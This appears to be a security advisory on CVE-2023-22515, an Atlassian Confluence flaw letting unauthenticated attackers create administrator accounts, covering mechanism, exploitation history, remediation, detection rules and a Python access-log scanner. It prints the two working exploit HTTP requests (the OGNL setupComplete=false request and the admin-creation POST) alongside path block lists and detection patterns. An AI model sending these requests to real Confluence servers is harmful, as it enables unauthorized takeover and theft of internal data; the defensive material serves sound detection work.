
CVE-2023-22515: Atlassian Confluence — Privilege Escalation to Admin

CVE Details

CVE ID: CVE-2023-22515
CVSS Score: 10
Severity: Critical
Vendor: Atlassian
Product: Confluence Data Center and Server
Patch Status: Available
Published: January 31, 2026

Background

Atlassian Confluence is one of the most widely used enterprise collaboration and wiki platforms, deployed by thousands of organisations globally for documentation, project management, and knowledge management. Confluence Data Center and Server deployments store sensitive internal documentation, project specifications, credentials, and institutional knowledge that attackers find extremely valuable.

CVE-2023-22515 is a zero-day privilege escalation vulnerability disclosed by Atlassian on October 4, 2023, with a CVSS score of 10.0. The vulnerability allows unauthenticated external attackers to create administrator accounts on publicly-accessible Confluence instances. Atlassian noted that a limited number of customers had already been attacked before the advisory was published, and CISA’s KEV listing confirmed active exploitation. The vulnerability is particularly significant because Confluence typically stores sensitive internal documentation that would be of high intelligence value.

Technical Mechanism

CVE-2023-22515 exploits a flaw in Confluence’s setup and configuration endpoint handling. Confluence’s initial setup wizard includes an endpoint for creating the first administrator account. This endpoint (/setup/setupadministrator.action) is supposed to be inaccessible on a system that has already been configured with administrator accounts — but the access control check can be bypassed.

The vulnerability is in the Confluence servlet filter chain. Normally, Confluence checks whether initial setup has been completed and restricts access to setup endpoints accordingly. However, certain request manipulation techniques allow an attacker to access the setup endpoint on an already-configured Confluence instance.

Exploitation technique:

# Accessing the normally-restricted setup endpoint
POST /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: confluence.target.com
Content-Type: application/x-www-form-urlencoded

# This request manipulates the application's setup state flag

# Follow-up request to create admin account
POST /setup/setupadministrator.action HTTP/1.1
Host: confluence.target.com
Content-Type: application/x-www-form-urlencoded

username=attacker&fullName=System+Admin&email=attacker%40evil.com&password=P%40ssw0rd&confirm=P%40ssw0rd&setup-next-button=Next

The key mechanism is that Confluence uses OGNL (Object-Graph Navigation Language) for expression evaluation in certain contexts, and the bootstrapStatusProvider.applicationConfig.setupComplete parameter is evaluated as an OGNL expression that modifies the application’s runtime state, setting the “setup complete” flag to false. This tricks Confluence into presenting the setup wizard as if the instance is unconfigured.

Once the setup wizard is accessible, creating a new administrator account is trivial. With administrator access, the attacker can:

  • Install plugins containing arbitrary Java code (full RCE)
  • Export all Confluence spaces and pages
  • Access user credentials stored in Confluence’s database
  • Modify Confluence configuration including authentication providers

Real-World Exploitation Evidence

Microsoft’s threat intelligence team (MSTIC) attributed exploitation of CVE-2023-22515 to Storm-0062, a threat actor linked to Chinese state-sponsored espionage. Key observations:

  • Zero-day exploitation: Storm-0062 exploited the vulnerability beginning September 14, 2023, three weeks before Atlassian’s October 4 advisory. This indicates the vulnerability was obtained through prior research or purchase.
  • Targeted initial access: Unlike many exploited vulnerabilities, early exploitation appeared targeted at specific organisations rather than opportunistic mass exploitation.
  • Intelligence gathering: Post-exploitation activity focused on enumerating and exfiltrating Confluence content rather than deploying ransomware or cryptominers.
  • Plugin-based persistence: Attackers installed malicious Confluence plugins to maintain persistent access and execute code.

After public disclosure, broader exploitation including opportunistic actors was documented, with multiple security vendors reporting exploitation attempts against exposed Confluence instances globally.

Impact Assessment

Confluence administrator access provides significant reach:

  • Complete content access: All Confluence spaces, pages, attachments, and comments are readable — this includes sensitive internal documentation, project plans, security architecture documents, and credentials stored in pages.
  • User credential access: Confluence stores hashed user credentials; local authentication hashes can be extracted and cracked.
  • Remote code execution via plugins: Confluence’s plugin system executes arbitrary Java code in the JVM context, providing full server-side RCE.
  • Macro execution: Malicious wiki macros can be used for continued code execution in user browsers (XSS pivot) or server-side execution.
  • Integration credential theft: Confluence integrates with Jira, Active Directory, LDAP, and SSO systems; configuration credentials for these integrations are accessible.

Affected Versions

Product                          | Affected Versions | Fixed Version
Confluence Data Center           | 8.0.0 – 8.3.2     | 8.3.3, 8.4.3, 8.5.2, 8.6.0
Confluence Server                | 8.0.0 – 8.3.2     | 8.3.3, 8.4.3, 8.5.2
Confluence Data Center (earlier) | < 8.0.0           | Not affected

Note: Atlassian Confluence Cloud is not affected.

Remediation Steps

  1. Upgrade Confluence: Apply the fixed versions immediately. For environments where immediate upgrade is not possible, apply the interim measures below.

  2. Restrict network access (interim): Block access to the following paths at the network perimeter:

     /setup/*
     /server-info.action
     /bootstrapstatusprovider/*

  3. Check for compromise indicators:

     • Review the list of Confluence administrator accounts for unexpected entries
     • Check the Confluence audit log for account creation events
     • Review installed plugins for any not recognised by your team

  4. Disable Confluence temporarily: If you cannot immediately patch or restrict access, take the instance offline until remediation is complete.

  5. Rotate all service account credentials: If compromise is suspected, rotate all credentials stored in Confluence pages and in Confluence’s integration configurations.

  6. Review Confluence logs: Check atlassian-confluence.log and the access logs for requests to setup endpoints.

Detection Guidance

Log sources:

  • Confluence application log: <confluence-home>/logs/atlassian-confluence.log
  • Access log: <confluence-install>/logs/localhost_access_log.*.txt
  • Audit log: Administration > Audit Log in the Confluence UI

Suspicious patterns:

POST /server-info.action?bootstrapStatusProvider
POST /setup/setupadministrator.action
GET /setup/setupstart.action

Indicators of Compromise:

  • Unexpected entries in Administration > Users for accounts created outside normal processes
  • New plugins in Administration > Manage apps/plugins not installed by your team
  • Audit log entries showing admin account creation via the setup wizard
  • HTTP 200 responses to /setup/ endpoints (should return 403 or redirect)

Suricata signature:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Atlassian Confluence CVE-2023-22515 Exploit Attempt"; flow:established,to_server; http.uri; content:"/setup/setupadministrator.action"; sid:9000225; rev:1;)
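Added detection example (not from the original page or from Atlassian): a small Python scanner that applies the suspicious request patterns and the "HTTP 200 to /setup/ endpoints" indicator above to access-log lines. It assumes a Tomcat-style Common Log Format line shape (client, ident, user, timestamp, request, status, bytes) and runs over constructed sample entries.

```python
import re
from urllib.parse import urlsplit

# Assumed Tomcat access-log shape: client, ident, user, [timestamp], "request", status, bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
SETUP_PREFIXES = ("/setup/", "/bootstrapstatusprovider/")

def classify(line):
    """Return (client_ip, severity, reason) for a CVE-2023-22515 pattern, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, status = m["ip"], m["method"], int(m["status"])
    url = urlsplit(m["target"])
    path, query = url.path, url.query
    if path == "/server-info.action" and "bootstrapStatusProvider" in query:
        # Attempt to flip the setupComplete flag through the OGNL-evaluated parameter
        return (ip, "high", "setup-state manipulation via /server-info.action")
    if path == "/setup/setupadministrator.action" and method == "POST":
        # A 200 here means the wizard accepted the form on a configured instance
        sev = "critical" if status == 200 else "high"
        return (ip, sev, "administrator creation via setup wizard (status %d)" % status)
    if path.startswith(SETUP_PREFIXES):
        # Setup endpoints should return 403 or a redirect once setup is complete
        if status == 200:
            return (ip, "high", "setup endpoint served HTTP 200: %s" % path)
        return (ip, "medium", "request to setup endpoint %s (status %d)" % (path, status))
    return None

def scan(lines):
    """Run classify over an iterable of log lines and keep the hits, in input order."""
    return [hit for hit in map(classify, lines) if hit is not None]

# Constructed sample lines for demonstration; not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Oct/2023:10:15:01 +0000] "POST /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1" 302 0',
    '203.0.113.7 - - [04/Oct/2023:10:15:02 +0000] "GET /setup/setupstart.action HTTP/1.1" 200 4821',
    '203.0.113.7 - - [04/Oct/2023:10:15:03 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 200 3104',
    '198.51.100.4 - - [04/Oct/2023:10:16:00 +0000] "GET /setup/setupstart.action HTTP/1.1" 403 0',
    '192.0.2.10 - - [04/Oct/2023:10:17:00 +0000] "GET /display/ENG/Home HTTP/1.1" 200 9912',
]

if __name__ == "__main__":
    for ip, sev, reason in scan(SAMPLE_LOG):
        print(f"{sev.upper():8} {ip:15} {reason}")
```

Feed it the real localhost_access_log files with `scan(open(path))`; a single client producing the high/critical sequence in order is the strongest signal, while medium hits against a 403 are usually scanners hitting a correctly blocked endpoint.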

Timeline

Date               | Event
September 14, 2023 | Earliest known exploitation by Storm-0062 (zero-day)
October 4, 2023    | Atlassian publishes advisory; patches released
October 4, 2023    | CISA adds CVE-2023-22515 to KEV catalogue
October 5, 2023    | Microsoft MSTIC publishes Storm-0062 attribution
October 2023       | Broad exploitation by multiple actors documented
October 16, 2023   | CISA, FBI, MS-ISAC joint advisory published